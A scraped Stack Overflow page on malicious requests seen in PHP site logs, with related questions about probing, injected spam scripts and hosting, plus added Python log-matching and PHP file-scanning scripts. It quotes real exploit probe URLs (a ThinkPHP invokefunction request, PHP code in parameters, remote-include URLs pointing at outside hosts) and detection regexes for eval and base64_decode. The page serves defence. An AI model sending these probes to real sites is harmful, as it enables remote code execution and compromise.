Malicious request in log [closed] - php

Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 1 year ago.
I am receiving malicious requests, therefore I seek your help. I log the page URLs visited, and some of them are like http://example.com/?a=fetch&content=<php>die(#md5(HelloThinkCMF))</php> and some are like http://example.com/?XDEBUG_SESSION_START=phpstorm and one more is like http://example.com/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&var What are these users trying to do, and how should I improve the security and take precautions?

It seems the users are trying to use URL injection to attack your website. They are adding malicious code to URLs and sending them to the web server. If this code is run by the PHP process, then it can cause damage to databases or the file system.
I faced a similar problem. I was able to fix the problem by installing Fail2Ban and ModSecurity. ModSecurity is an open source Web Application Firewall. It allows blocking malicious requests using predefined rules. Fail2Ban is a server intrusion prevention tool that checks for certain text patterns in log files using regular expressions. It automatically adds rules to the system's firewall, banning the user.
See these blog posts on how to install Fail2Ban and ModSecurity.
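The kind of log matching the answer describes, applied to the three request shapes quoted in the question. This is an added example, not code from the answer or from Fail2Ban or ModSecurity; the rule names, the `classify` and `scan` helpers and the sample log lines are constructed for illustration and assume the Apache/nginx "combined" log format.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Rules derived from the three request shapes quoted in the question.
RULES = {
    "xdebug-session-probe": re.compile(r"[?&]XDEBUG_SESSION_START=", re.I),
    "php-code-in-parameter": re.compile(r"<\?(php|=)|</?php>", re.I),
    "function-invocation": re.compile(r"invokefunction|call_user_func(_array)?", re.I),
}

# "combined" format: client IP first, request line in double quotes.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"')

def classify(target):
    """Return the sorted rule names matched by one request target."""
    # Decode twice so that double-encoded payloads (%253C...) are also seen.
    decoded = unquote_plus(unquote_plus(target))
    return sorted(name for name, rx in RULES.items() if rx.search(decoded))

def scan(lines):
    """Map client IP -> set of rule names seen in that client's requests."""
    hits = defaultdict(set)
    for line in lines:
        m = LOG_LINE.match(line)
        if m:
            hits[m.group("ip")].update(classify(m.group("target")))
    return {ip: rules for ip, rules in hits.items() if rules}

# Constructed sample lines (documentation IP ranges, not real traffic).
STAMP = "[10/Oct/2023:13:55:36 +0000]"
SAMPLE = [
    '203.0.113.7 - - ' + STAMP + ' "GET /?a=fetch&content=%3Cphp%3Edie(%23md5'
    '(HelloThinkCMF))%3C/php%3E HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.7 - - ' + STAMP + ' "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.9 - - ' + STAMP + ' "GET /index.php?s=/Index/\\think\\app/invokefunction'
    '&function=call_user_func_array&var HTTP/1.1" 404 196 "-" "-"',
    '192.0.2.44 - - ' + STAMP + ' "GET /index.php?page=2 HTTP/1.1" 200 1024 "-" "-"',
]

if __name__ == "__main__":
    for ip, rules in scan(SAMPLE).items():
        print(ip, sorted(rules))
```

The per-IP grouping is what a ban decision would be based on: one client matching several rules is a scanner, while the ordinary request from 192.0.2.44 produces no entry.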

Related

How do I block unknown calls to my sites? [closed]

Closed 2 years ago.
I have some security issue with my website. It started by creating a wp-admin directory on my FTP server with a malicious .txt file. index.php was also changed (some code at the beginning was added).
I changed all passwords and completely deleted the CMS folder from the server. I also removed the wp-admin directory and the malicious code from index.php.
Lots of unauthorized connections to my website started with this change.
Details here:
database log
All calls to .shtml files were blocked by .htaccess file.
Unfortunately there are still attempts to access other resources
for example:
/wp-load.php?daksldlkdsadas&
/ajax-index.php?url=http://domainnamespace.top/lf.jpeg
/aindex.php?daksldlkdsadas&
/wp-load.php?WordPress=newzealandpolicy.wang/popn.txt&Database=1index.php
/sitemapimages79.xml
/sitemapimages5.xml
How can I prevent these calls?
What kind of attack is it and what is its purpose?
It's not a WordPress-based website.

How is a mis-named folder a hack attempt? [closed]

Closed 6 years ago.
My website is entirely written by me in PHP on Notepad, no WordPress or the like. The only known weakness is that due to a complicated hardware situation, I cannot use HTTPS for the login area. It runs on a shared hosting account at iPage. It's 'LAMP'.
I am set up to monitor reasons why the 404 page is called. This is where my concern comes. Someone is making attempts on folders in all lower case. This is more alarming because these folder words are in the login area sometimes. For example, if I have a file at /loginArea/myHidden/index.php these odd requests are aimed at /myhidden for some reason. Notice no caps and lack of the first directory. This has been happening at a rate of one per day, from random IP addresses all around the world. You might assume this was a coding mistake on my part at first, but I am 100% certain that has been ruled out by now. They are moving around my folder structure, poking like they are searching for something.
They seem to be limited to folder words they could sniff from HTTP traffic of logged-in users. They have not hit one that is known only to me.
No damage seems to have been done, but I am getting DAILY attempts and want to know what they are hoping for.

What is the difference deploying a site in web server or cloud? [closed]

Questions asking for code must demonstrate a minimal understanding of the problem being solved. Include attempted solutions, why they didn't work, and the expected results. See also: Stack Overflow question checklist
Closed 9 years ago.
I built a website using PHP and want to deploy it on the internet. I want to know which is the best option, hosting on a web server or in the cloud, and what the pros and cons of each will be.
Resources needed for my site:
PHP
MySQL
Apache or lighttpd
My site is simple CMS with 10 pages (max).
A web server has defined hardware specifications, meaning that if too many users try to access it, it will fail to answer their requests.
Cloud hosting providers will restrict you in what you can do (what language, what APIs you can access, ...), but they usually allow for automatic scaling, meaning: If the first instance's ("server's") load exceeds a certain limit, a second instance may start automatically to handle half of the load, and so on.
A single server often is sufficient for PHP sites, but you may suffer the slashdot effect, i. e. a sudden peak of attention to your site may bring it down quickly.
You didn't specify the kind of application you are going to deploy and the kind of resources your application needs. Anyhow, below are the points you need to consider to decide cloud vs non-cloud.
1) Availability
2) Scalability
3) Security
4) Cost effective
Prons:
1) Security
2) Limited control.

How to setup remote php on my server? [closed]

Closed 9 years ago.
I made a PHP-based webapp and a customer of mine needs it on his website. Now I want to put the PHP code on my server and let the customer's website include it remotely. How do I set this up? And can I restrict the access when the customer doesn't need the app anymore, and is it secure?
There is no such thing as remote PHP. It doesn't work that way. However, you can set up some API to communicate between the two servers on the backend. You'd still need both servers to be capable of this interaction, which means both servers still need to be fully functional. And if your code on the client's server can talk to your API on the host server, then they can take that code, see how it interacts with your host and replicate it.
A very simple solution would be to put the PHP-generated content from your website in an <iframe> on their website.

Malware spaming from my site [closed]

Closed 9 years ago.
Someone placed a script in my site that sends email. How can I find this script?
I use Parallels and Linux CentOS.
I searched the site for the keyword "mail(", but it could also be that the code is like a hash.
It could be anywhere, and it could be anything. It could even have been deleted.
We did have a situation a while back where a client lost control of their password due to a keylogger and someone was uploading a CGI script to spam emails, running it then deleting it. We only found out via FTP logs what was going on.
Try checking your FTP logs and web server logs, and if all that fails and you are sure it is PHP, then try searching for eval( as that is an often-used tactic to hide what a script is doing.
More importantly though, my suggestion would be to get someone who is experienced in server management to have a look at your site as a matter of urgency. If they were able to upload a file to your site once, then even if you remove it, it won't stop them doing it again until you find exactly how they were able to do it.
You might also have a look at your scripts. Is there a contact form somewhere on your site? You might not have escaped user input very well, which gives an attacker the ability to send mails to other recipients.
I had a similar situation in my early days until the host blocked the script and told me to fix it.
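A file-system search along the lines the answers above suggest: look for eval( and mail( in PHP files, plus the decoding wrappers and long encoded strings that hide a call from a plain keyword search. This is an added example, not code from any of the answers; the function names, the list of wrapper calls, the 200-character threshold and the sample snippets are assumptions chosen for illustration.

```python
import os
import re
import sys

# eval( and mail( come from the thread; the decoding wrappers are added here
# because they are what makes a plain search for "mail(" come up empty.
SUSPICIOUS_CALLS = re.compile(
    r"\b(eval|base64_decode|gzinflate|str_rot13|mail)\s*\(", re.I)
# A long unbroken base64-looking literal often carries an encoded payload.
ENCODED_BLOB = re.compile(r"[A-Za-z0-9+/=]{200,}")
PHP_EXTENSIONS = (".php", ".phtml", ".inc")

def findings_for(source):
    """Return the sorted indicator names found in one file's text."""
    found = {m.group(1).lower() + "(" for m in SUSPICIOUS_CALLS.finditer(source)}
    if ENCODED_BLOB.search(source):
        found.add("long-encoded-string")
    return sorted(found)

def scan_tree(root):
    """Return {relative path: (mtime, indicators)} for flagged PHP files."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                indicators = findings_for(fh.read())
            if indicators:
                # The mtime helps line a file up with FTP and web server logs.
                rel = os.path.relpath(path, root)
                report[rel] = (os.path.getmtime(path), indicators)
    return report

# Constructed samples: a payload hidden behind eval/base64, and a benign page.
SAMPLE_HIDDEN = "<?php eval(base64_decode('" + "QUJD" * 60 + "')); ?>"
SAMPLE_BENIGN = "<?php echo htmlspecialchars($_GET['q'] ?? ''); ?>"

if __name__ == "__main__" and len(sys.argv) > 1:
    for rel, (mtime, indicators) in sorted(scan_tree(sys.argv[1]).items()):
        print(f"{mtime:.0f}  {rel}  {', '.join(indicators)}")
```

A hit is a file to review, not proof of compromise: legitimate code also calls mail( and base64_decode(, and as the first answer notes, an uploaded script may already have been deleted.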
